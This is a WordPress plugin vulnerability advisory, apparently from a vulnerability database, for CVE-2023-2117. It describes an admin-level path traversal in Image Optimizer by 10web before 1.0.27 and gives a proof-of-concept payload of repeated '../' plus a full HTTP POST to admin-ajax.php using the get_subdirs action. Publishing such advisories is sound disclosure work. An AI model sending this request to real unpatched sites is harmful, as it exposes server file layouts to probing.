WordPress Plugin Vulnerabilities

Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal

Description

The plugin does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.

Proof of Concept

- Payload: ../../../../../../../../../../../../../../../../../../../
- At the "Other directory" function, select a directory -> At param "dir" add payload: ../../../../../../../../../../ ../ ../../../../../../../../../../..

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admiin+]

action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../

Affects Plugins

Plugin icon
image-optimizer-wd
Fixed in 1.0.27

References

CVE
CVE-2023-2117

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
4.1 (medium)

Miscellaneous

Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
44024299-ba40-4da7-81e1-bd44d10846f3

Timeline

Publicly Published
2023-05-02 (about 7 months ago)
Added
2023-05-02 (about 7 months ago)
Last Updated
2023-05-02 (about 7 months ago)

Other

Published
Title
Published
2020-03-13
Title
WordPress File Upload < 4.13.0 - Directory Traversal to RCE
Published
2022-09-19
Title
Contact Form by WPForms < 1.7.5.5 - Admin+ Arbitrary File Access
Published
2021-07-24
Title
AceIDE <= 2.6.2 - Authenticated (admin+) Arbitrary File Access
Published
2014-09-20
Title
W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read
Published
2017-09-29
Title
Insert Pages < 3.2.4 - Directory Traversal